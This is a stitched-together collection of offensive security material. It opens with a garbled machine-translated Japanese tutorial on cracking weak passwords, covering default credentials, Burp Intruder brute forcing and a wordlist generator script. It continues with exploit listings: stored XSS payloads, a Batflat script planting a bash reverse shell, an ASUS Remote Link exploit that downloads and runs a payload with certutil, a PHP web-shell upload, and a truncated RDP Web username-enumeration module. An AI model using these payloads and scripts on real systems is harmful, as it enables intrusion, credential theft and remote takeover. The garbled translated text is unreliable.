159753 QWER1234 A000000 QQ123123 ZXC123 123654 ABC123456 123456Q QQ5201314 12345678 00000A 456852 AS123456 1314521 112233 521521 QAZWSX123 ZXC123456 ABCD1234 ASDASD 666666 love1314 qaz123 aaa123 q1w2e3 aaaaaa a123321 123000 1111111111112qwaszx5845201314 S123456 NIHAO123 CAONIMA123 ZXCVBNM123 WANG123 159357 1A2B3C4D ASDASD123 584520 753951 147258 1123581321 110120 QQ1314520 ウェブサイトの背景については、一般的に次のようになります。 管理者 マネージャー admin123 admin888 Admin666 具体的には、バックグラウンドタイプが異なると、パスワードが弱いとは異なります。 データベース(phpmyadmin):アカウント:root、password:root、root123、123456 Tomcat:アカウント番号:admin、tomcat、Manager、Password:admin、tomcat、admin123、123456、マネージャー jboss:アカウント番号:管理者、jboss、マネージャー、パスワード:管理者、jboss、マネージャー、123456 weblogic:account:weblogic、admin、manager、password:weblogic、admin、manager、123456 条件型 個人の弱いパスワードは、多くの場合、その人の個人情報(名前、誕生日、携帯電話番号、特別なニックネーム、趣味、ソーシャルソフトウェアアカウント、一般的に使用されているユーザー名、電子メール.)、関係メンバー(家族、ボーイフレンド、ガールフレンド.)、環境(ライセンスプレート番号、会社名、会社の設立時間または場所などの会社情報、会社ドメインなど)、特別な指定キャラクターなどに関連付けられています。ここでは、いくつかの一般的な組み合わせもリストします。このパスワード推測Webサイトを使用して、条件付き弱いパスワード辞書を生成できます。 たとえば、私たちが人を知っている場合、彼の情報は次のとおりです。 名前:Wang Xiaoerメール:412391882@qq.com 英語名:Twowang携帯電話番号:110 次に、このウェブサイトにこの情報を入力して、以下の「送信」をクリックします 次に、この可能性の高いパスワードを取得します。 また、リマインダー:パスワードの組み合わせに大文字が含まれている必要がある場合、中国のパスワード設定習慣に従って、83%が大文字を入れ、唯一の既存の大文字を最初に置きます。 ###廃棄物パスワードの実現 たとえば、このようなコードを使用して、特定のシステムの背景をシミュレートする弱いパスワードの脆弱性を実証します。 ?php 関数showform(){? 
form method='post' action='。/lesspass.php' 入力型='テキスト' name='un' / 入力型='パスワード' name='pw' / 入力タイプ='送信'値='ログイン' / /form?php } $ un=@$ _ post ['un']; $ pw=@$ _ post ['pw']; if($ un=='' $ pw=='') showform(); else if($ un=='admin' $ pw=='admin888') echo 'ログインに正常に'; それ以外{ showform(); エコー「ログインが失敗した」; } 展開後、lesspass.phpとして保存し、http://LocalHost/lessPass.phpにアクセスします。 次に、実際のパスワードを知らないふりをして試してみます。管理者アカウントの場合、ユーザー名は一般に管理者であり、パスワードはAdmin、Admin123、Admin888、123456、123Abcadminなどです。 その後、AdminおよびAdmin123、または失敗します。最後に、私はAdminとAdmin888を試しましたが、成功しました。 まず、ブラウザとバーププロキシを構成し、バープの傍受モードをオンにする必要があります。その後、lesspass.phpページに何かを入力して送信します。あなたはげっぷで傍受されたパケットを見ることができます: パスワードを爆発させるには、その侵入者機能を使用し、右クリックしてメニューをポップアップし、「侵入者への送信」を選択する必要があります。 次に、侵入者のタブページにアクセスし、Position subtabページでパケットを見ることができます。 すべてのマークをクリアするには、右側のクリアボタンをクリックする必要があります。パスワードをクラックする必要があるため、パスワードパラメーター値を選択し、[追加]をクリックします。 その後、その横の[ペイロード]タブに切り替え、中央の[読み込み]ボタンをクリックして、辞書をロードします。以前のTOP100.TXTを選択します。 Admin888を挿入することを忘れないでください。下の入力ボックスにadmin888を入力し、[次の追加]をクリックします。 右上隅の攻撃を開始するには、爆発を開始します(古いバージョンは侵入者です - 攻撃メニューバーを開始)、結果のリストが表示されます。 長さのヘッダーをクリックして、長さで並べ替えます。長さとは大きく異なるアイテムがあることがわかり、正しい結果です。 ダブルクリックPKAV HTTP Fuzzer 1.5.6.exeを開く。さらに、ディレクトリにはユーザーマニュアル、PKAV HTTP FuzzerユーザーマニュアルVer 1.0.pdfもあります。このマニュアルを参照できます。このチュートリアルでは、使用される機能についてのみ説明します そのメインインターフェイスは次のようなものです。 左側には「リクエストパッケージ」入力ボックスがあります。 httpパケット(つまり、burpのプロキシ - インターセプトタブにあるもの)コピーします。次に、PWの位置で管理者を選択し、以下の「マークの追加」をクリックします。 右側の「リプレイ設定」を見てみましょう。 「リプレイモード」と「バリエーション割り当て」を変更する必要はありません。下の[インポート]ボタンをクリックし、以前のTOP100.TXTを選択します。 次に、[追加]ボタンの右側にある入力ボックスにadmin888を入力し、[追加]をクリックします。 次に、下の[銀行家]タブをクリックし、新しいインターフェイスで「開始」をクリックします。 次に、「長さ」ヘッダーをクリックして、長さで並べ替えます。 パスワードがadmin888で長さが6であり、他の値が他の値である場合にのみ、正しいパスワードであることがわかります。 ###弱いパスワードの脆弱性の説明 通常、他の人が容易に推測するパスワード(彼らはあなたをよく知っているかもしれません)またはひび割れのツールによってひび割れたパスワードは弱いパスワードであると考えられています。一般的な弱いパスワードは次のとおりです。 1.数字または文字が連続または混合されているように配置されているため、キーボード文字は連続して配置されます(123456、ABCDEF、123ABC、QWERTY、1QAZ2WSXなど)。 2。誕生日、名前+誕生日(ソーシャルワーカーにひびを入れるのはとても簡単です) 3。フレーズパスワード(5201314、Woaini1314など) ### wrailパスワード生成 
パスワード生成の弱いことに関して、関連するツールまたはスクリプトを使用できます。インターネットには多くのツールがあり、自分で検索してダウンロードできます。ここで私は自分自身を書いた小さなPythonスクリプトを提供します。必要な場合は、自分で変更してください。参照のみ: # - * - coding: utf-8-* - weak_password=['000000'、 '0000000'、 '111111'、 '11111111'、 '112233'、 '123123'、 '123321'、 '123456'、 '12345678' '' 、 '87654321'、 '123456789'、 '987654321'、 '1234567890'、 '0123456789'、 '654321'、 '666666'、 '888888'、 '66888'、 '6 6668888 '、' abcdef '、' 147258369 '、' abcabc '、' abc123 '、' a1b2c3 '、' aaa111 '、' 123qwe '、' qweasd '、' admin '、' root '、' pass123 '、' p@ssword '、' password '、' passwd '、' iloveyou '、' woaini '、' 5201314 '、' qq123456 '、' taobao '、' wang1234 ']] foreign_weak_password=['password'、 '123456'、 '12345678'、 'qwerty'、 'abc123'、 'monkey'、 '1234567'、 'letmein '、' Trustno1 '、' Dragon '、' Baseball '、' 111111 '、' iloveyou '、' Master '、' Sunshine '、' Ashley '、' Bailey '、' passw0rd '、' Shadow '、' 123123 '、' 654321 '、' Superman '、' qazwsx '、' Michael '、' Football '、' qwerty '、' welcome '、' holly '、' happy '、' anty '、' abcabcabc '、' commintorator '、' commintorator '、' commintorator '、' commintorator name=['xiaoming'、 'xiaoming'、 'xiaoming'、 'xiao_ming'、 'xiaom'、 'xming'、 'xming'、 'xming'、 'xl'、 'xm']] Birth=['1995'、 '_ 1995'、 '09'、 '9'、 '23'、 '199509'、 '_ 950923'、 '_ 199509'、 '9509'、 '0923'、 '199509'、 '0923'、 '19950925'] SpecialNum=['1314'、 '520'、 '000'、 '111'、 '123'、 '168'、 '1234'、 '123456'、 '5201314'、 '888'、 '666'、 '123123'] id=['mingxiaozi'、 'xiaolifidao']] companyinfo=['jingdong'、 'jongdong'、 'jd'、 'jd']] #自分で詳細を説明してください f=open( 'weakpasswords.txt'、 'w') in beaw_password:の場合 f.write(a+'\ n') forience_weak_password:のbの場合 f.write(b+'\ n') name:のCの場合 出生:のDの場合 f.write(c+d+'\ n') f.write(d+c+'\ n') name:のeの場合 SpecialNum:のFの場合 f.write(e+f+'\ n') f.write(f+e+'\ n') ID:のI1の場合 出生:のB1の場合 f.write(i1+b1+'\ n') f.write(b1+i1+'\ n') ID:のI2の場合 SpecialNum:のS1の場合 f.write(i2+s1+'\ n') f.write(s1+i2+'\ n') n1 n1 n1:の場合 出生:のB1の場合 s2 inの場合 SpecialNum: f.write(n1+s2+b1+'\ n') f.write(s2+n1+b1+'\ n') f.write(s2+b1+n1+'\ n') 
#自分でより多くの組み合わせ ###弱いパスワードのヒント 1。特定のルールに従って、簡単に読む、または私たちが若い頃に最初に接触した数字または文字の一部を読みます。 123456、123ABC、ABC123、123456ABCDEF!@#これらの弱いパスワードはローラーキーボードとも呼ばれると冗談を言う人もいます。たとえば、admin!@#は単純に見えませんが、実際にローラーキーボードであり、パスワードが弱いです。実際の侵入管理者でこの弱いパスワードに何度も遭遇しました!@#防衛戦略:企業従業員にセキュリティトレーニングを提供して、セキュリティ認識を向上させます。セキュリティには運がありません。キーボードタイプのパスワードを使用すると、困難なパスワードを使用してみてください。 2。パスワードの漏れにつながる、または簡単に推測される可能性のある意図しない情報漏れは、白人憎しみの想像力に疑問を抱かないでください。彼らがCTFを行うとき、彼らは大きなアイデアを持っています。中国のサブサイトの弱いパスワード:lujiaji(voidance著者:blast)https://www.secpulse.com/archives/14056.htmla brief reak、このパスワードは典型的な弱いパスワードではありません。推測のみに依存している場合、成功することができない場合があります。しかし、ポイントは、あるニュースでは、ニュース著者のルジアジが表示され、管理バックエンドアカウントのパスワードがルジアジであるということです。したがって、壊れている理由は2つあります。一部またはすべてのユーザー名が一般に公開されています。管理者:Lujiajiのユーザー名とパスワードは同じです。 jd.comからのいくつかの機密情報は、Github(脆弱性著者:匿名)https://www.secpulse.com/archives/22828.htmlに漏れていました。もう1つのことは、パスワード自体が弱くないことですが、開発者は自分のウェブサイトまたはシステムがあまりにも好きで、ユーザー名またはパスワードが推測可能になることです。たとえば、Webサイトがwww.p1a2s3s4word.comの場合、開発者または管理者は、システムのユーザー名をWebサイトドメイン名または会社名に設定できます。例:P1A2S3S4WORD、P1A2S3S4WORD123 XIAOMIイントラネットローミングノート(弱いパスワードはさまざまな内部システムを漏らします):XIAOMI11(脆弱性著者:臨時労働者) 対処戦略:(1)。ログイン名とユーザー名を区別する必要があります (2)。パスワードがユーザー名やまったく同じ状況を含めることを防ぐために、効果的なパスワードポリシーを実装します。 (3)githubは暗黙のセキュリティの主要な源であることを忘れないでください (4)。ビジネス名やドメイン名からパスワード情報を簡単に取得できるパスワードを使用しないでください。 3.パスワードの強度は信頼できますが、多数のシステムが同じパスワードを使用しています
PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting
# Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting # Date: 2021-02-16 # Exploit Author: Anmol K Sachan # Vendor Homepage: https://www.peel.fr/ # Software Link: https://sourceforge.net/projects/peel-shopping/ # Software: PEEL SHOPPING 9.3.0 # Vulnerability Type: Stored Cross-site Scripting # Vulnerability: Stored XSS # Tested on Windows 10 XAMPP # This application is vulnerable to Stored XSS vulnerability. # Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php # Vulnerable parameters: 'Comments / Special Instructions :' # Payload used: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e # POC: in the same page where we injected payload refresh the page. # You will see your Javascript code (XSS) executed.
Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)
# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)
# Date: 2020-12-27
# Exploit Author: mari0x00
# Vendor Homepage: https://batflat.org/
# Software Link: https://github.com/sruupl/batflat/archive/master.zip
# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/
# Version: <= 1.3.6
# CVE: CVE-2020-35734

#!/usr/bin/python3

# Defensive summary of what this listing demonstrates: after an admin login,
# the "add user" form accepts a PHP tag in the `fullname` field and the
# "manage users" page then evaluates it. Detection opportunities visible
# below: a multipart POST to the add-user endpoint whose `fullname` value
# starts with `<?php`, followed immediately by a GET of `admin/users/manage`
# and an outbound connection from the web server. The vendor fix is not
# part of this listing; the root cause is unescaped user data reaching PHP
# evaluation, so output encoding / not rendering profile fields through
# eval-like paths is the mitigation to verify.

import requests
import sys
import re
from bs4 import BeautifulSoup
from termcolor import colored
from time import sleep

print(colored('''###########################################################''',"red"))
print(colored('''####### Batflat authenticated RCE by mari0x00 #######''',"red"))
print(colored('''###########################################################''',"red"))
print("")

# Positional arguments: <url> <username> <password> <IP> <PORT>; the URL is
# expected to end with a slash (it is concatenated with "admin/" below).
if len(sys.argv) != 6:
    print((colored("[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>","red")))
    print((colored("[~] Default credentials: admin/admin","red")))
    print((colored("[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444","red")))
    exit()

url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]

# One session so the admin cookie is reused; the browser User-Agent is fixed
# in every request (a static UA string is itself a usable IoC).
s = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}

# Authenticate. The login response is never inspected, so a wrong password
# only surfaces later as an AttributeError on the regex `.group(1)` calls.
print((colored("[+] Attempting user login","blue")))
login_data = {
    "username": username,
    "password": password,
    "login": "",
}
login = s.post(url+"admin/", login_data, headers=headers)
sleep(0.5)

# Scrape the per-session `t=` token from the first "Add" link in the admin
# page; the page is parsed with BeautifulSoup but searched as raw text.
print((colored("[+] Retrieving the token","blue")))
r = s.get(url+"admin/", headers=headers).content
soup = BeautifulSoup(r, "lxml")
token = (re.search(r't=(.*?)">Add', str(soup)).group(1))
print((colored("[+] Token ID: " + token,"blue")))
sleep(0.5)

# Resolve the add-user form's action attribute (first `action="..."` found).
print((colored("[+] Getting the add-user endpoint URL","blue")))
r = s.get(url+"admin/users/add?t="+token, headers=headers).content
soup = BeautifulSoup(r, "lxml")
add_user_url = (re.search(r'action="(.*?)"', str(soup)).group(1))
sleep(0.5)

# Create a user whose full name is a PHP snippet. Sent as multipart/form-data
# (the `files=` tuples with a None filename) rather than urlencoded.
print((colored("[+] Adding pwnd user","blue")))
payload = "<?php system(\"/bin/bash -c 'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1'\");?>"
add_user = {
    "username": (None, "pwnd"),
    "fullname": (None, payload),
    "description": (None, "pwnd"),
    "email": (None, "pwnd@evil.com"),
    "password": (None, "pwnd123"),
    "access[]": (None, "users"),
    "save": (None, "Save")
}
exploit = s.post(add_user_url, headers=headers, files=add_user)
sleep(0.5)

# Rendering the user list is what evaluates the stored snippet; the extra
# "pwnd" account persists afterwards and is the artefact to look for.
print("")
print((colored("[+] Triggering the shell. Go nuts!","green")))
r = s.get(url+"admin/users/manage?t="+token, headers=headers)
ASUS Remote Link 1.1.2.13 - Remote Code Execution
# Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution
# Date: 24-02-2021
# Exploit Author: H4rk3nz0
# Vendor Homepage: http://asus.com/
# Software Link: http://remotelink.asus.com/
# Version: 1.1.2.13
# Tested on: Windows 10 Enterprise Build 17763
# CVE: N/A

#!/usr/bin/python

# Python 2 only: `str.decode("hex")` does not exist in Python 3.
#
# Defensive summary of what this listing demonstrates: the Remote Link
# service on TCP/5665 accepts mouse and keyboard input from any client that
# completes a fixed handshake; no credential appears anywhere in that
# handshake, and the client self-declares its display name. Detection
# opportunities visible below: inbound connections to 5665 from unexpected
# hosts, a client name of "Windows Defender", a `cmd.exe` launched from the
# Remote Link process, and `certutil.exe -urlcache` fetching a file into
# C:\Windows\Temp. Mitigation: do not expose the service beyond trusted
# networks and firewall 5665 on hosts that do not use the feature.

import socket
from time import sleep
import sys

port = 5665
target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# Packet templates (hex strings, decoded to bytes just before sending).
prefix = "04020b02"
suffix = "0000020000000000000000000300000000000000000004000000000000000000010000"
# Key frame for Enter: 4-byte prefix padded with zero nibbles to 523 bytes.
enter = (prefix + ("0" * 1038)).decode("hex")
# Key frame for a printable character: prefix + one hex byte + zero padding.
string_prefix = "04020b0200000000010000"
string_suffix = "0" * 1022
# Sent before every key frame.
pre_command = "04000b0200000000".decode("hex")
user_declare = ("02028a0000000000000057696e646f777320446566656e646572" + "0" * 224).decode("hex") # Declares Connection Source as 'Windows Defender'

# ASCII to Hex Character List
# Maps each typeable character to its ASCII value as two hex digits; any
# character outside this table raises KeyError in SendString.
characters={
    "A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
    "O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
    "a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
    "o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
    "1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
    " ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
    ">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
    "(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
    "\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}

# User Specified arguments
# NOTE(review): rhost is a fixed address even though the usage text
# advertises <target-ip> as the first argument; sys.argv[1] is never read.
# The bare `except:` is meant to catch the IndexError of missing arguments
# but also masks any other error raised here.
try:
    rhost = "192.168.1.93"
    lhost = sys.argv[2]
    payload = sys.argv[3]
except:
    print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>")
    exit()

# HandShake Packets to Smart Gesture Server
# Connects the TCP socket, then replays the fixed greeting and the
# self-declared client name. Every later call uses sendto() with an explicit
# address on this already-connected stream socket; whether the address is
# ignored or rejected with EISCONN is platform-dependent, so plain send()
# would be the portable choice.
def Handshake():
    target.connect((rhost,port))
    target.sendto("b2".decode("hex"),(rhost,port))
    target.sendto("38323538".decode("hex"),(rhost,port))
    target.sendto("03000f0000000000".decode("hex"),(rhost,port))
    target.sendto("03020f000000000003310000000000".decode("hex"),(rhost,port))
    target.sendto("02008a0000000000".decode("hex"),(rhost,port))
    target.sendto(user_declare,(rhost,port))
    sleep(0.1)

# Replays a recorded pointer-movement sequence 16 times, presumably to drag
# the cursor to a known screen position before clicking.
# NOTE(review): the loop extent is inferred from the collapsed listing —
# confirm against the original file before relying on it.
def MoveMouse():
    for i in range(0,16):
        target.sendto("0000330038040006".decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101db010000c502" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101d0010000ca02" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101c7010000ce02" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101bd010000d202" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101b2010000d502" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101a6010000d802" + suffix).decode("hex"),(rhost,port))
        target.sendto(("0001330038040006010199010000db02" + suffix).decode("hex"),(rhost,port))
        target.sendto(("000133003804000601018d010000de02" + suffix).decode("hex"),(rhost,port))
        target.sendto(("0001330038040006010180010000e002" + suffix).decode("hex"),(rhost,port))
        target.sendto(("0001330038040006010171010000e402" + suffix).decode("hex"),(rhost,port))
        target.sendto(("0001330038040006010163010000e602" + suffix).decode("hex"),(rhost,port))
        target.sendto(("0001330038040006010154010000e902" + suffix).decode("hex"),(rhost,port))
        target.sendto(("0001330038040006010146010000eb02" + suffix).decode("hex"),(rhost,port))
        target.sendto(("000133003804000601013b010000ed02" + suffix).decode("hex"),(rhost,port))
        target.sendto(("000133003804000601012d010000f002" + suffix).decode("hex"),(rhost,port))
        target.sendto(("0001330038040006010120010000f302" + suffix).decode("hex"),(rhost,port))
        target.sendto(("0001330038040006010113010000f702" + suffix).decode("hex"),(rhost,port))
        target.sendto(("0001330038040006010107010000fa02" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101fa000000fd02" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101f10000000003" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101e50000000303" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101d90000000603" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101ce0000000903" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101c20000000d03" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101b60000001103" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101ab0000001403" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101a00000001803" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101950000001c03" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101890000002003" + suffix).decode("hex"),(rhost,port))
        target.sendto(("000133003804000601017e0000002403" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101740000002703" + suffix).decode("hex"),(rhost,port))
        target.sendto(("000133003804000601016c0000002a03" + suffix).decode("hex"),(rhost,port))
        target.sendto(("00013300380400060101650000002c03" + suffix).decode("hex"),(rhost,port))
        target.sendto(("000133003804000601015c0000002f03" + suffix).decode("hex"),(rhost,port))
        target.sendto(("000133003804000601015c0000003003" + suffix).decode("hex"),(rhost,port))
        target.sendto(("000233003804000601005c0000003003" + suffix).decode("hex"),(rhost,port))
        sleep(0.6)

# Sends Left Click Input (Occasional Delay for some Reason)
# Eight identical "button down" frames followed by one "button up" frame,
# then a 4 s pause for the target to react.
def LeftClick():
    target.sendto("0000330038040006".decode("hex"),(rhost,port))
    target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
    target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
    target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
    target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
    target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
    target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
    target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
    target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
    target.sendto(("0002330038040006010016020000e502" + suffix).decode("hex"),(rhost,port))
    sleep(4)

# Send Enter/Return Key Input
def SendReturn():
    target.sendto(pre_command,(rhost,port))
    sleep(0.2)
    target.sendto(enter,(rhost,port)) # Enter/Return Key

# Send String Characters
# One key frame per character, 0.2 s apart; characters not in the table
# above raise KeyError. Nothing here is echoed back, so there is no
# confirmation that the keystrokes were delivered.
def SendString(string):
    for char in string:
        convert = characters[char]
        final_string = string_prefix + convert + string_suffix
        target.sendto(pre_command,(rhost,port))
        target.sendto(final_string.decode("hex"),(rhost,port))
        sleep(0.2)

# Main Execution
# Sequence: handshake, position the pointer, click, type into whatever has
# focus. The whole chain is timing-based; none of the steps checks a reply,
# so a slow or differently-laid-out desktop silently breaks it.
def main():
    print("[+] Saying Hello")
    Handshake()
    sleep(2)
    print("[+] Moving Mouse")
    MoveMouse()
    print("[+] Left Clicking (takes a few seconds)")
    LeftClick() # Left Click is delayed sometimes
    print("[+] Opening CMD")
    SendString("cmd.exe") # Start Command Prompt
    sleep(0.5)
    SendReturn()
    sleep(1)
    print("[+] Retrieving Payload")
    # Note the asymmetric escaping: `\T` is not a Python escape, so the
    # destination path is emitted with a single backslash before "Temp".
    SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\Temp\\" + payload) # Retrieve Payload
    sleep(0.5)
    SendReturn()
    sleep(3)
    print("[+] Executing")
    SendString("C:\\Windows\\Temp\\" + payload) # Execute Payload
    sleep(0.5)
    SendReturn()
    sleep(0.5)
    print("[+] Done! Check your listener?")
    SendReturn() # Trailing Enter Command Ensures full execution
    target.close()
    exit()

if __name__=="__main__":
    main()
Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS)
# Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS) # Date: 2021-02-25 # Exploit Author: Tushar Vaidya # Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip # Version: v1.0 # Tested on: Ubuntu *Steps to Reproduce:* 1) Login with Admin Credentials and click on the '*Manage category*' button. 2) Click on the '*Add Categories*' button. 3) Now enter 'Ba1man' in the input field of '*Category*' and intercept the request with Burp Suite. 4) Now put the following payload in the input field of *Category* (the parameter name is *catename*). Payload: ba1man"><script>alert(document.cookie)</script> 5) Click On Save 6) Now go to '*Manage category > View Categories*' 7) The XSS payload is triggered. *proof-of-concept:* 1) Request: POST /lagos_parker/parker/addcategory.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/lagos_parker/parker/addcategory.php Content-Type: application/x-www-form-urlencoded Content-Length: 82 Connection: close Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn Upgrade-Insecure-Requests: 1 catename=ba1man"><script>alert(document.cookie)</script>&submit=
Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated)
# Exploit Title: Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated) # Date: 2021-02-25 # Exploit Author: sml@lacashita.com # Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip # Version: v1.0 # Tested on: Ubuntu 20.04.2 uploadID.php can be used to upload .php files to '/uploads/employees_ids/' without authentication. POC --- 1) Make the following Request changing the "Host:" to your Victim IP. POST /dashboard/uploadID.php HTTP/1.1 Host: 192.168.1.117 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 Content-Length: 267 DNT: 1 Connection: close -----------------------------5825462663702204104870787337 Content-Disposition: form-data; name="employee_ID"; filename="cmd2.php" Content-Type: image/png <?php $cmd=$_GET['cmd']; system($cmd); ?> -----------------------------5825462663702204104870787337-- 2) You will get the response with the name of the uploaded file (upload_filename). HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Feb 2021 19:17:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 77 {"upload_filename":"Ag1rzKFWTlnCZhL_cmd2.php","selected_filename":"cmd2.php"} 3) Your file will be located in: http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php 4) In this example, to run commands: http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami
-
Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# standard modules
from metasploit import module
# extra modules
# Third-party imports are made optional at import time so the module still
# loads and can report a clear error from run() rather than failing on import.
DEPENDENCIES_MISSING = False
try:
    import base64
    import itertools
    import os
    import requests
except ImportError:
    DEPENDENCIES_MISSING = True

# Metasploit Metadata
# 'timeout' is the whole oracle: a login POST that is answered within the
# window marks the username as valid, one that stalls past it marks it invalid.
# From the defender's side every probe is a POST to login.aspx with the same
# (wrong) password value, which is the signature to alert on.
metadata = {
    'name': 'Microsoft RDP Web Client Login Enumeration',
    'description': '''
        Enumerate valid usernames and passwords against a Microsoft RDP Web Client
        by attempting authentication and performing a timing based check against
        the provided username.
    ''',
    'authors': [
        'Matthew Dunn'
    ],
    'date': '2020-12-23',
    'license': 'MSF_LICENSE',
    'references': [
        {'type': 'url', 'ref': 'https://raxis.com/blog/rd-web-access-vulnerability'},
    ],
    'type': 'single_scanner',
    'options': {
        'targeturi': {'type': 'string', 'description': 'The base path to the RDP Web Client install', 'required': True, 'default': '/RDWeb/Pages/en-US/login.aspx'},
        'rport': {'type': 'port', 'description': 'Port to target', 'required': True, 'default': 443},
        'domain': {'type': 'string', 'description': 'The target AD domain', 'required': False, 'default': None},
        'username': {'type': 'string', 'description': 'The username to verify or path to a file of usernames', 'required': True, 'default': None},
        'password': {'type': 'string', 'description': 'The password to try or path to a file of passwords', 'required': False, 'default': None},
        'timeout': {'type': 'int', 'description': 'Response timeout in milliseconds to consider username invalid', 'required': True, 'default': 1250},
        'enum_domain': {'type': 'bool', 'description': 'Automatically enumerate AD domain using NTLM', 'required': False, 'default': True},
        'verify_service': {'type': 'bool', 'description': 'Verify the service is up before performing login scan', 'required': False, 'default': True},
        'user_agent': {'type': 'string', 'description': 'User Agent string to use, defaults to Firefox', 'required': False, 'default': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
    }
}


def verify_service(rhost, rport, targeturi, timeout, user_agent) -> bool:
    """Verify the service is up at the target URI within the specified timeout

    Returns True only for an HTTP 200 whose body contains 'RDWeb'.  A timeout
    returns False silently; any other exception is logged at 'error' and also
    yields False.  ``timeout`` is in milliseconds and is converted to seconds
    for requests.
    """
    url = f'https://{rhost}:{rport}/{targeturi}'
    headers = {'Host':rhost, 'User-Agent': user_agent}
    try:
        # verify=False disables TLS certificate validation (presumably for
